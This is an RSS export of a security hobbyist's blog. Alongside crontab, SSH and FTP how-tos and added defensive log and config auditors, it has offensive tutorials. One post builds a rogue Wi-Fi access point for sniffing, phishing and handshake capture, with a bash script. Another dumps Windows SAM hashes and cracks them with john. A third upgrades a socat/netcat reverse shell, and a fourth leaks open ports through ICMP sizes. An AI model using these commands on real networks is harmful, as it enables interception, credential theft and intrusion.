Digital Notes – GoSecure! (https://www.gosecure.it/blog) – MyDear(root)Shell
Feed last built: Fri, 11 Apr 2014 10:35:54 +0000

Use Crontab to schedule tasks on Linux
https://www.gosecure.it/blog/art/438/note/use-contrab-to-schedule-tasks-on-linux/
Fri, 20 Dec 2013 17:26:01 +0000

You can use Crontab to schedule the execution of tasks. The command crontab -l lists all the jobs already scheduled in your crontab, and the -e option opens it for editing.
The basic format string looks like this:

A B C D E /bin/do_something.sh

Where
A = minutes (0-59)
B = hours (0-23)
C = day (1-31)
D = month (1-12)
E = week day (0-6 where 0 is Sunday)

The following are examples for:
– Execute /bin/do_something.sh at 9:40 PM from Monday to Wednesday
– Execute the script every 15 minutes, every day
– Execute the script at minute 21 and minute 44 of every hour, every day, but only in December

40 21 * * 1-3 /bin/do_something.sh
*/15 * * * * /bin/do_something.sh
21,44 * * 12 * /bin/do_something.sh

Other interesting options:
@reboot = Run once, at startup
@yearly = Run once a year. Like “0 0 1 1 *”
@annually (same as @yearly)
@monthly = Run once a month. Like “0 0 1 * *”
@weekly = Run once a week. Like “0 0 * * 0”
@daily = Run once a day. Like “0 0 * * *”
@midnight (same as @daily)
@hourly = Run once every hour. Like “0 * * * *”

This executes /bin/do_something.sh once, at startup:

@reboot /bin/do_something.sh
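The five fields and the @-aliases above are easy to get subtly wrong (the */step form, the 0/7 Sunday convention, and the way cron combines the day-of-month and weekday fields). The following Python script is an added example, not code from the original post: it parses a crontab line into sets of allowed values and answers "would this line fire at this minute?" for the three schedules shown above. The only non-standard assumption is the field syntax itself, which follows Vixie cron: when both the day-of-month and weekday fields are restricted, a match on either is enough.

```python
"""Minimal crontab time-field parser and matcher (added example)."""
from datetime import datetime

# Field order and inclusive ranges: minute, hour, day of month, month, weekday.
# Cron accepts both 0 and 7 for Sunday in the weekday field.
FIELD_RANGES = [(0, 59), (0, 23), (1, 31), (1, 12), (0, 7)]

# The @-aliases listed in the post, mapped to their five-field equivalents.
ALIASES = {
    "@yearly": "0 0 1 1 *",
    "@annually": "0 0 1 1 *",
    "@monthly": "0 0 1 * *",
    "@weekly": "0 0 * * 0",
    "@daily": "0 0 * * *",
    "@midnight": "0 0 * * *",
    "@hourly": "0 * * * *",
}


def parse_field(field, lo, hi):
    """Expand one time field (*, N, A-B, comma lists, /step) into a set of ints."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
            if step < 1:
                raise ValueError(f"bad step in {field!r}")
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            start, end = int(a), int(b)
        else:
            start = int(part)
            # "N/step" means "from N to the end of the range, every step".
            end = hi if step > 1 else start
        if not lo <= start <= end <= hi:
            raise ValueError(f"{field!r} outside {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return values


def parse_line(line):
    """Parse one crontab line into (fields, dom_star, dow_star, command).

    fields is a list of five sets, or None for @reboot (no time fields).
    dom_star / dow_star record whether the day fields were unrestricted ("*...").
    """
    line = line.strip()
    if line.startswith("@"):
        alias, _, command = line.partition(" ")
        if alias == "@reboot":
            return None, True, True, command.strip()
        line = ALIASES[alias] + " " + command
    parts = line.split(None, 5)
    if len(parts) < 6:
        raise ValueError("expected five time fields and a command")
    fields = [parse_field(f, lo, hi) for f, (lo, hi) in zip(parts[:5], FIELD_RANGES)]
    if 7 in fields[4]:          # normalise Sunday to 0
        fields[4] -= {7}
        fields[4].add(0)
    return fields, parts[2].startswith("*"), parts[4].startswith("*"), parts[5]


def fires_at(line, when):
    """True if the crontab line would run at the minute given by `when`."""
    fields, dom_star, dow_star, _ = parse_line(line)
    if fields is None:
        return False            # @reboot is not time-driven
    minute, hour, dom, month, dow = fields
    cron_dow = (when.weekday() + 1) % 7     # Python: Monday=0; cron: Sunday=0
    day_ok = when.day in dom
    wday_ok = cron_dow in dow
    # Vixie cron rule: if both day fields are restricted, either match suffices.
    day_match = (day_ok or wday_ok) if (not dom_star and not dow_star) else (day_ok and wday_ok)
    return when.minute in minute and when.hour in hour and when.month in month and day_match


if __name__ == "__main__":
    when = datetime(2013, 12, 17, 21, 40)   # a Tuesday evening
    for spec in ("40 21 * * 1-3 /bin/do_something.sh",
                 "*/15 * * * * /bin/do_something.sh",
                 "21,44 * * 12 * /bin/do_something.sh"):
        print(f"{spec!r} fires at {when}: {fires_at(spec, when)}")
```

Run it as a script to see the three schedules evaluated against one timestamp; the dom/dow rule is the one to remember when a job like "0 0 1 * 1" seems to run more often than expected.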

How can you manipulate the output?

By default the output is sent to the mailbox of the user who owns the crontab (root here), but it can be redirected.
This appends standard output and errors to the file do_something.log:

@weekly /bin/do_something.sh >> /var/log/do_something.log 2>&1

Send a mail to me@mydomain.com:

* 1,2,3 * * * /bin/script 2>&1 | mail -s "Cronjob output" me@mydomain.com

Discard all output:

@daily /bin/script > /dev/null 2>&1

Rogue Access Point using Kali Linux
https://www.gosecure.it/blog/art/376/note/rougue-access-point-using-kali-linux/
Fri, 20 Sep 2013 10:07:44 +0000

A Rogue Access Point (RAP) is a fake wifi access point that can be used to sniff information.
Basically you have a PC (a Kali Linux live system in this case) with 2 interfaces: a wired one (eth0) connected to a working network and a wireless one (wlan0).
The wireless card is configured as an access point (AP) and a bridge is created to link the wired and wireless connections.
When a user connects to the new hot spot, his data is bridged through the PC to the wired connection and forwarded to the destination (the internet).
I use the airbase-ng command (aircrack-ng suite) for these operations.

Some scenarios:
Sniffing traffic
I set up a RAP and start wireshark, ettercap or another network sniffer. Every connection that passes through my PC is intercepted.
Phishing
I set up a RAP and force it to use my own DNS server. If someone connects to me and starts to surf, I am able to redirect traffic using my DNS. In this case I can implement some kind of phishing.
Company network back door
I set up, maybe using a small Raspberry Pi, an access point that uses the company network as its wired interface. This is a hot spot directly connected to the company LAN.
Caffè-Latte attack
Looking at the wireless packets you can see clients trying to connect to previously registered access points (e.g. MY_NETWORK). I can set up an access point using the same SSID the client is searching for. When the client, which is searching for a known SSID, finds my RAP named MY_NETWORK it immediately tries to connect. I can use this connection to sniff WPA handshakes or WEP packets and try to recover passwords.
Extend my connection
I have a notebook connected to a LAN but no access point. I also have a smartphone and I want a wireless connection on the fly.

The basic configuration:
– eth0, the wired connection linked to the network
– a DHCP server working on the LAN where eth0 is connected
– wlan0, a wireless interface that can be put into monitor mode

I start the monitor mode on wlan0:

root@kali:~# airmon-ng start wlan0

This will create the mon0 interface.
Now I set up an AP on mon0, named “MY_network”, on channel 11 with WEP authentication. I can also set it up as an open wifi without a password (see airbase-ng --help).

root@kali:~# airbase-ng --essid MY_network -c 11 -w abcdefabcdefabcdefabcdef12 mon0

This will create the at0 interface.
Now that the AP is started, in another terminal window I make a bridge (called test-bridge below) and link at0 to eth0 using bridge-utils. Note that in Kali Linux bridge-utils has to be installed (apt-get install bridge-utils) in order to use the brctl command.

root@kali:~# brctl addbr test-bridge
root@kali:~# brctl addif test-bridge eth0
root@kali:~# brctl addif test-bridge at0

I can release the IPs of eth0 and at0. The two interfaces are now part of the virtual bridge and don’t need an IP anymore:

root@kali:~# ifconfig eth0 down
root@kali:~# ifconfig eth0 0.0.0.0 up
root@kali:~# ifconfig at0 down
root@kali:~# ifconfig at0 0.0.0.0 up

I also need IP forwarding:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Finally I configure test-bridge. Unlike eth0 and at0, the bridge needs an IP address on the LAN where eth0 is connected.

root@kali:~# ifconfig test-bridge 192.168.x.y netmask 255.255.255.0 broadcast 192.168.x.255 up
root@kali:~# route add default gw 192.168.x.1

Note that these are temporary operations that are discarded when the system reboots.
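The procedure above builds the fake hot spot; from the defender's side, the same setup is what a wireless survey should catch. The following Python script is an added example, not code from the original post: it compares a scan against an inventory of an organisation's own access points and flags unknown BSSIDs advertising a known SSID (an evil twin like the MY_network example) as well as known BSSIDs whose security setting changed. The inventory, scan records, SSIDs and BSSIDs are all constructed for the example.

```python
"""Flag rogue / evil-twin access points in a wireless scan (added example)."""

# Assumed inventory of legitimate APs: BSSID -> (SSID, security). Constructed values.
KNOWN_APS = {
    "00:11:22:33:44:01": ("MY_network", "WPA2"),
    "00:11:22:33:44:02": ("MY_network", "WPA2"),
    "00:11:22:33:44:10": ("GUEST", "OPEN"),
}

# Constructed scan output: (ssid, bssid, channel, security, signal_dbm).
SCAN = [
    ("MY_network", "00:11:22:33:44:01", 1, "WPA2", -55),
    ("MY_network", "00:11:22:33:44:02", 6, "WEP", -60),      # known AP, weakened
    ("MY_network", "de:ad:be:ef:00:11", 11, "WEP", -40),     # impostor, strong signal
    ("GUEST", "00:11:22:33:44:10", 11, "OPEN", -58),
    ("CoffeeShopFree", "ca:fe:00:00:00:01", 3, "OPEN", -70),  # unrelated network
]


def find_rogue_aps(scan, known):
    """Return (bssid, ssid, reason) for every AP that deserves a look."""
    corporate_ssids = {ssid for ssid, _ in known.values()}
    findings = []
    for ssid, bssid, channel, security, _signal in scan:
        if bssid in known:
            expected_ssid, expected_security = known[bssid]
            if ssid != expected_ssid:
                findings.append((bssid, ssid, "known BSSID advertising an unexpected SSID"))
            elif security != expected_security:
                findings.append((bssid, ssid,
                                 f"security changed from {expected_security} to {security}"))
        elif ssid in corporate_ssids:
            # An AP we do not own is broadcasting one of our SSIDs: evil-twin pattern.
            findings.append((bssid, ssid,
                             f"unknown BSSID impersonating corporate SSID ({security}, ch {channel})"))
    return findings


def strongest_impostor(scan, known):
    """BSSID of the impersonating AP with the best signal (clients will prefer it), or None."""
    impostors = {b for b, _, reason in find_rogue_aps(scan, known)
                 if reason.startswith("unknown BSSID")}
    candidates = [(signal, bssid) for _, bssid, _, _, signal in scan if bssid in impostors]
    return max(candidates)[1] if candidates else None


if __name__ == "__main__":
    for bssid, ssid, reason in find_rogue_aps(SCAN, KNOWN_APS):
        print(f"{bssid}  {ssid:<14} {reason}")
    print("strongest impostor:", strongest_impostor(SCAN, KNOWN_APS))
```

In practice the scan tuples would come from the output of your wireless survey tool; the logic stays the same: anything not in the inventory that carries your SSID, or anything in the inventory that no longer matches it, is a finding.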

Extra
Starting an AP to sniff the handshake:

root@kali:~# airbase-ng -c 6 -e ESSID -z 2 -W 1 -F file.cap wlan0

-z sets the WPA1 tags (2 = TKIP)
-W sets the WEP flag in beacons. The option -W 1 is recommended when using -z or -Z
-F where to store the cap file.

Here’s my old simple script to start a Rogue Access Point using Linux Bash. It may need some adjustment, but I think it will work.

#!/bin/bash
echo "---------------------------------------"
echo "Script per la creazione di un Rougue AP"
echo "---------------------------------------"
echo "Digita"
echo "  Per creare un Rougue AP per la cattura dell'handshake digita ----> 1"
echo "  Per creare un Rougue AP per condividere la connessione digita ---> 2"
read CHOSE1
if [ "${CHOSE1}" = "1" ]
then
# Start: create an AP to capture the handshake
echo
echo "Creazione AP per cattura handshake"
echo
echo "Quale essid vuoi utilizzare?"
read ESSID1
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN1
echo "IL file con i pacchetti è salvato in /tmp/${ESSID1}.cap"
ifconfig wlan0 down
airmon-ng start wlan0
airbase-ng -c "${CHAN1}" -e "${ESSID1}" -z 2 -W 1 -F "/tmp/${ESSID1}.cap" wlan0
# End: AP for handshake capture
read
elif [ "${CHOSE1}" = "2" ]
then
# Start: create an AP to share the connection
echo
echo "Creazione AP per condivisione connessione"
echo
echo "Faccio partire la funzionalità di monitoring su wlan0"
ifconfig wlan0 down
airmon-ng start wlan0
echo "Creo un AP sull'interfaccia virtuale at0"
echo "Quale essid vuoi utilizzare?"
read ESSID
echo "Su quale canale vuoi che trasmetta (1-11)"
read CHAN
echo "Impostare una password? (y/n)"
read CHOSE2
    if [ "${CHOSE2}" = "y" ]
    then
    # airbase-ng runs in its own terminal window; the message uses single quotes
    # inside the double-quoted bash -c string (nested double quotes broke the old version)
    gnome-terminal --geometry 83x19 -x bash -c "
    echo 'La password è stata impostata di default WEP abcdefabcdefabcdefabcdef12'
    airbase-ng --essid ${ESSID} -c ${CHAN} -w abcdefabcdefabcdefabcdef12 mon0"
    else
    echo "La password non è stata impostata"
    gnome-terminal --geometry 83x19 -x bash -c "
    airbase-ng --essid ${ESSID} -c ${CHAN} mon0"
    fi
# Give airbase-ng a moment to create at0 before it is added to the bridge
sleep 2
echo "Creo l'interfaccia br0 bridge e vi collego eth0 e at0"
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
ifconfig eth0 down
ifconfig eth0 0.0.0.0 up
ifconfig at0 down
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Inserisci i dati per la nuova interfaccia bridge creata"
echo -n "Indirizzo ip:"
read IP
echo -n "Netmask:"
read NETMASK
echo -n "Broadcast:"
read BROAD
echo -n "Gateway:"
read ROUTE
ifconfig br0 "${IP}" netmask "${NETMASK}" broadcast "${BROAD}" up
route add default gw "${ROUTE}"
# End: AP for connection sharing
read
else
echo "Scelta non corretta premere invio per uscire dal programma."
read
fi

Listener discovery using ping PoC
https://www.gosecure.it/blog/art/204/note/listener-discovery-using-ping-poc/
Fri, 19 Jul 2013 13:40:07 +0000

This is an awesome way to use everyday programs/commands in an unusual way. This PoC can be used to discover open ports on a remote PC when we are able to send it a blind command but have no idea how TCP is controlled in the remote environment. These simple scripts take advantage of the length of the ICMP packets sent by the ping command. Some simple piping provides the normalization of the sent and captured strings. In the following case two Linux machines are used.

On the local PC I start a logging process:

iptables -I INPUT -p ICMP -j LOG

On the PC to test, maybe using a blind command:

netstat -lntp | grep LISTEN | awk '{print $4}' | cut -d: -f2 | grep -ve "^$" |sort -u | while read line ; do echo $line; ping -c 1 -s $line <remote_PC>; done;

Again on the local PC I collect and normalize the log:

tail /var/log/messages | grep LEN |awk '{print $13}'| cut -d= -f2 |sort -n -u| while read line; do PORT=$(($line-28)) && echo Open Port = $PORT; done;
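The same LOG lines that the last command decodes are also what a defender would look at to notice this trick: one source sending a burst of echo requests whose sizes are neither the default 84 bytes nor constant. The following Python script is an added example, not code from the original post: it parses the kernel LOG format that the iptables rule above produces, reports the non-default echo-request sizes per source, and applies the same LEN-28 arithmetic as the post to show what those sizes would encode. The log lines and addresses are constructed.

```python
"""Spot ICMP payload-size signalling in iptables LOG output (added example)."""
import re
from collections import defaultdict

# A default `ping` carries 56 data bytes -> IP total length 56 + 8 (ICMP) + 20 (IP) = 84.
DEFAULT_PING_LEN = 84
HEADER_OVERHEAD = 28   # the 28 bytes the post subtracts from LEN to recover the port

# The kernel LOG target writes "SRC=... DST=... LEN=... PROTO=ICMP TYPE=..."; capture only
# the fields needed here.
LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) LEN=(?P<len>\d+) .*?PROTO=ICMP TYPE=(?P<type>\d+)"
)

# Constructed sample: one benign ping from 10.0.0.5, then the sizes that probing
# ports 22, 80 and 443 from 10.0.0.2 would produce, then an unrelated echo reply.
SAMPLE_LOG = """\
Jul 19 13:40:01 kali kernel: [ 120.1] IN=eth0 OUT= MAC=00:00:00:00:00:01:00:00:00:00:00:02:08:00 SRC=10.0.0.5 DST=10.0.0.3 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO=ICMP TYPE=8 CODE=0 ID=100 SEQ=1
Jul 19 13:40:02 kali kernel: [ 121.2] IN=eth0 OUT= MAC=00:00:00:00:00:01:00:00:00:00:00:03:08:00 SRC=10.0.0.2 DST=10.0.0.3 LEN=50 TOS=0x00 PREC=0x00 TTL=64 ID=2 DF PROTO=ICMP TYPE=8 CODE=0 ID=200 SEQ=1
Jul 19 13:40:03 kali kernel: [ 122.3] IN=eth0 OUT= MAC=00:00:00:00:00:01:00:00:00:00:00:03:08:00 SRC=10.0.0.2 DST=10.0.0.3 LEN=108 TOS=0x00 PREC=0x00 TTL=64 ID=3 DF PROTO=ICMP TYPE=8 CODE=0 ID=200 SEQ=1
Jul 19 13:40:04 kali kernel: [ 123.4] IN=eth0 OUT= MAC=00:00:00:00:00:01:00:00:00:00:00:03:08:00 SRC=10.0.0.2 DST=10.0.0.3 LEN=471 TOS=0x00 PREC=0x00 TTL=64 ID=4 DF PROTO=ICMP TYPE=8 CODE=0 ID=200 SEQ=1
Jul 19 13:40:05 kali kernel: [ 124.5] IN=eth0 OUT= MAC=00:00:00:00:00:01:00:00:00:00:00:04:08:00 SRC=10.0.0.7 DST=10.0.0.3 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=5 PROTO=ICMP TYPE=0 CODE=0 ID=300 SEQ=1
"""


def parse_icmp_log(text):
    """Yield (src, ip_total_length, icmp_type) for every ICMP LOG line in `text`."""
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            yield m["src"], int(m["len"]), int(m["type"])


def odd_sized_echo_requests(text):
    """Map source IP -> sorted list of distinct echo-request lengths that are not the default."""
    sizes = defaultdict(set)
    for src, ip_len, icmp_type in parse_icmp_log(text):
        if icmp_type == 8 and ip_len != DEFAULT_PING_LEN:   # TYPE=8 is echo request
            sizes[src].add(ip_len)
    return {src: sorted(s) for src, s in sizes.items()}


def suspected_signalling(text, min_distinct=2):
    """Sources using several distinct odd sizes, with the values those sizes would encode."""
    return {src: [n - HEADER_OVERHEAD for n in lens]
            for src, lens in odd_sized_echo_requests(text).items()
            if len(lens) >= min_distinct}


if __name__ == "__main__":
    for src, values in suspected_signalling(SAMPLE_LOG).items():
        print(f"{src}: {len(values)} distinct odd-sized echo requests, encoding {values}")
```

Feed it the relevant lines of /var/log/messages (or the journal) instead of the sample; a single host with many distinct non-default sizes in a short window is the signature to alert on, while a lone oversized ping is usually just an MTU test.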

I based this Proof of Concept on the article “Blind Command Line Injection” from PenTest Magazine by Mr. Chris Duffy: thank you.


Setting up an SSH server on Kali Linux
https://www.gosecure.it/blog/art/194/note/194ssh-on-kali/
Mon, 15 Jul 2013 22:46:35 +0000

Environment:
The SSH server is a Kali Linux machine (hostname: kali, ip: 10.0.0.3)
The SSH client is a Backtrack machine (hostname: bt, ip: 10.0.0.2)

Configuration:
On the Kali distribution the SSH server is already installed, so I only have to start it; I can do it using the menu Applications > Kali Linux > System Services > SSH > sshd start.
After that I can immediately connect from the client using password authentication:

root@bt:~# ssh root@10.0.0.3
root@10.0.0.3's password:
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Of course I want to secure the SSH server, so I stop the service and set SSH up to use RSA key authentication.
On the server I create the keys using the ssh-keygen command; this creates 2 keys:
– Public key, which stays on the server; in my case it is called id_rsa.pub
– Private key, used by the client, called id_rsa

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
eb:63:b6:89:a3:74:dd:76:9f:ea:7f:1e:d4:d4:ba:9b root@kali
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
|                .|
|                o|
|               o.|
|        S     ...|
|       . o    .. |
|    . . o o . .. |
|   . ..o+o . . +o|
|    ...++o .ooEo.|
+-----------------+

As I said, the private key has to be transferred to the client. I start a Netcat listener on the machine called bt:

root@bt:~# nc -lp 4444 > id_rsa

On the server, the Kali machine, I connect to the listener and transfer the key:

root@kali:~# nc -w 1 10.0.0.2 4444 < /root/.ssh/id_rsa

Note that an NC file transfer is not a secure way to pass the key, because NC isn’t an encrypted channel. I use this method because I am in a lab/test environment.

On the server I have to edit the file /etc/ssh/sshd_config to allow RSA authentication:

RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile      %h/.ssh/authorized_keys

It is a good idea to disable password authentication too:

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no

I save the file and restart the service.
The last server operation is to append the id_rsa.pub key to the file named in sshd_config by the AuthorizedKeysFile field:

root@kali:~# cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys

Note that I have to append the key (>>) to the file, not overwrite it (>), since I can have more than one public key stored in the same file.

I move to the client and give id_rsa the right permissions (chmod 600 id_rsa). I am not used to storing private keys in the default folder; I prefer to keep them in an encrypted folder and then use the -i option of the ssh client.

Ok, let’s try the access using my new RSA key:

root@bt:~# ssh root@10.0.0.3 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux kali 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali6 x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.

root@kali:~#

Remember that it is good:
– To store your private keys in a protected place
– To create keys with a strong passphrase
– To harden sshd_config (e.g. disable root access)
– To take a look at the auth log file (/var/log/auth.log)
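The last tip is the one that tells you whether the rest worked. The following Python script is an added example, not code from the original post: it parses the "Accepted"/"Failed" lines that OpenSSH writes to auth.log via syslog, counts failures per source address, and lists accepted logins that contradict the hardening above (anything not done with publickey, or any root login). The log lines, hostnames and addresses are constructed; the message format is OpenSSH's own.

```python
"""Summarise sshd login events from auth.log (added example)."""
import re
from collections import Counter

# OpenSSH syslog format: "Accepted publickey for root from 10.0.0.2 port 51234 ssh2"
# or "Failed password for invalid user admin from 10.0.0.9 port 40001 ssh2".
SSHD_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

# Constructed sample log: the key-based login from the post, a short password-guessing
# run from another host, one password login that should not have been possible, and
# a cron line that the parser must ignore.
SAMPLE_AUTH_LOG = """\
Jul 15 22:50:01 kali sshd[1201]: Accepted publickey for root from 10.0.0.2 port 51234 ssh2
Jul 15 22:51:02 kali sshd[1240]: Failed password for root from 10.0.0.9 port 40000 ssh2
Jul 15 22:51:05 kali sshd[1242]: Failed password for invalid user admin from 10.0.0.9 port 40001 ssh2
Jul 15 22:51:09 kali sshd[1244]: Failed password for invalid user oracle from 10.0.0.9 port 40002 ssh2
Jul 15 22:52:30 kali sshd[1260]: Accepted password for root from 10.0.0.9 port 40010 ssh2
Jul 15 22:53:00 kali CRON[1300]: pam_unix(cron:session): session opened for user root by (uid=0)
"""


def parse_sshd_events(text):
    """Return one dict per sshd login attempt: result, method, user, src, invalid_user."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.search(line)
        if m:
            events.append({
                "result": m["result"],
                "method": m["method"],
                "user": m["user"],
                "src": m["src"],
                "invalid_user": m["invalid"] is not None,
            })
    return events


def failures_by_source(events):
    """Failed attempts per source address (password guessing / user enumeration indicator)."""
    return Counter(e["src"] for e in events if e["result"] == "Failed")


def policy_violations(events, allowed_methods=("publickey",), root_allowed=False):
    """Accepted logins that contradict the sshd_config hardening described in the post."""
    return [e for e in events
            if e["result"] == "Accepted"
            and (e["method"] not in allowed_methods
                 or (e["user"] == "root" and not root_allowed))]


if __name__ == "__main__":
    events = parse_sshd_events(SAMPLE_AUTH_LOG)
    print("failures per source:", dict(failures_by_source(events)))
    for e in policy_violations(events):
        print(f"violation: {e['method']} login for {e['user']} from {e['src']}")
```

With PasswordAuthentication set to no, any "Accepted password" line means the restart did not take effect or the setting is overridden; with PermitRootLogin disabled, the root publickey login the post performs would show up here as well.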


SAM dump and Windows password decrypt
https://www.gosecure.it/blog/art/125/note/sam-dump-and-windows-password-decrypt/
Tue, 18 Jun 2013 13:29:06 +0000

Windows passwords are stored, encrypted, in the SAM file (c:\windows\system32\config\). In the same folder you can find the key to decrypt it: the file SYSTEM. These two files are locked by the kernel while the operating system is up, so to back them up and decrypt them you have to use a bootable Linux distro to mount the disk while the system is down, or use a program like fgdump, pwdump or meterpreter hashdump. Someone even told me it is possible to copy these files by causing a Blue Screen of Death and then dumping them remotely, but I never tried it.

An alternative, while the operating system is running, is to take the two twin files in the folder c:\windows\repair\ that the system creates as a backup. This works up to Windows XP (probably Vista too), but I was not able to find these files on Windows 7. If you know something more, write me.

Once you have the files, use bkhive to extract the bootkey:

bkhive /mnt/ntfs/Windows/System32/config/SYSTEM /tmp/bootkey

Then combine the bootkey and the SAM file:

samdump2 /mnt/ntfs/Windows/System32/config/SAM /tmp/bootkey > /tmp/hash.txt

And then try to crack the hash:

john --format=NT /tmp/hash.txt

This is just an example of how to use these tools. To crack hashes you can also use Google, which is always the biggest resource.


From a non interactive shell to an interactive one
https://www.gosecure.it/blog/art/118/note/from-a-non-interactive-shell-to-an-interactive-one/
Tue, 18 Jun 2013 10:08:59 +0000

As you can read at the end of this post, a remote shell obtained through command execution (-e cmd.exe or /bin/bash) isn’t a fully interactive command prompt.
These are the solutions I found to get a more stable shell. Note that I don’t talk about web remote shells such as c99, c100, weevely or other php/asp code that needs a web server. I also don’t want to talk about MSFvenom and similar; I focus on something similar to NC or SSH.

The target is a Linux system.
Using Python:
After you get a Netcat remote shell, execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is not completely interactive, but it is better than before.

It is better to use socat, which is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a fully interactive remote shell.

The target is a Windows system.
I suppose that in a Microsoft environment you don’t have Python or socat, although both programs have Windows binaries.
So the best way I found is to start a telnet server. Googling, I found some stand-alone programs like TelnetD. Note that it isn’t free software, but you can try it using the trial version.


Install ftp server on Kali Linux
https://www.gosecure.it/blog/art/93/note/install-ftp-server-on-kali-linux/
Thu, 13 Jun 2013 12:16:34 +0000

This is a simple how-to for installing the vsftpd server on Kali Linux. The most important configuration file is /etc/vsftpd.conf. Read it carefully and refer to the vsftpd home site.

Download and install vsftpd:

root@kali:~# apt-get install vsftpd

If you want to allow local users to log in and to allow FTP uploads, edit the file /etc/vsftpd.conf and uncomment the following:

local_enable=YES
write_enable=YES

Also set these parameters:

chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list

To secure your server, disable anonymous access if not required:

anonymous_enable=NO

If you wish, you can also modify the banner in vsftpd.conf, but this is useful only to prevent simple banner grabbing. A specific tool such as Nmap will discover your server version anyway.

Now create the file /etc/vsftpd.chroot_list and add the local users you want to allow to connect to the FTP server.
Start the service and test the connection:

root@kali:~# service vsftpd start
Starting FTP server: vsftpd.
root@kali:~# netstat -nat | grep 21
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN  
root@kali:~# ftp 127.0.0.1
Connected to 127.0.0.1.
220 (vsFTPd 2.3.5)
Name (127.0.0.1:root): user-one
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
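Because vsftpd silently falls back to its built-in default for any key that is missing or commented out, a line like "#anonymous_enable=NO" leaves anonymous access enabled. The following Python script is an added example, not code from the original post or from the vsftpd project: it parses the key=value format of /etc/vsftpd.conf, applies the daemon's documented defaults for absent keys, and reports every setting that differs from the values chosen above. The sample configuration is constructed; the defaults are those listed in the vsftpd.conf man page.

```python
"""Audit a vsftpd.conf against the settings used in the post (added example)."""

# The settings chosen in the post and why each one matters.
EXPECTED = {
    "anonymous_enable": ("NO", "anonymous logins should be off unless required"),
    "local_enable": ("YES", "needed for local users to log in"),
    "write_enable": ("YES", "needed for uploads"),
    "chroot_list_enable": ("YES", "confine the users named in chroot_list_file to their home"),
}

# Values vsftpd uses when a key is absent (vsftpd.conf man page). Note that with
# chroot_local_user=NO, chroot_list_file names the users who ARE chrooted.
DEFAULTS = {
    "anonymous_enable": "YES",
    "local_enable": "NO",
    "write_enable": "NO",
    "chroot_list_enable": "NO",
    "chroot_local_user": "NO",
    "chroot_list_file": "/etc/vsftpd.chroot_list",
}

# Constructed configuration with two of the post's settings left commented out.
SAMPLE_CONF = """\
# Example vsftpd configuration (constructed)
listen=YES
#anonymous_enable=NO
local_enable=YES
#write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
ftpd_banner=Welcome to blah FTP service.
"""


def parse_vsftpd_conf(text):
    """Return {key: value}; blank lines and '#' comment lines are ignored, as vsftpd does."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" not in line:
            raise ValueError(f"malformed vsftpd.conf line: {raw!r}")
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def effective(settings, key):
    """Value in force for `key`: the explicit setting if present, else the daemon default."""
    return settings.get(key, DEFAULTS.get(key))


def audit(text):
    """List (key, value_in_force, wanted, why) for each expected setting that is not in force."""
    settings = parse_vsftpd_conf(text)
    findings = []
    for key, (wanted, why) in EXPECTED.items():
        found = effective(settings, key)
        if found != wanted:
            findings.append((key, found, wanted, why))
    return findings


if __name__ == "__main__":
    for key, found, wanted, why in audit(SAMPLE_CONF):
        print(f"{key}: in force {found!r}, wanted {wanted!r} ({why})")
```

Run audit() on the real file before starting the service; the commented-out lines in the sample are exactly the mistake the uncommenting step above is meant to avoid.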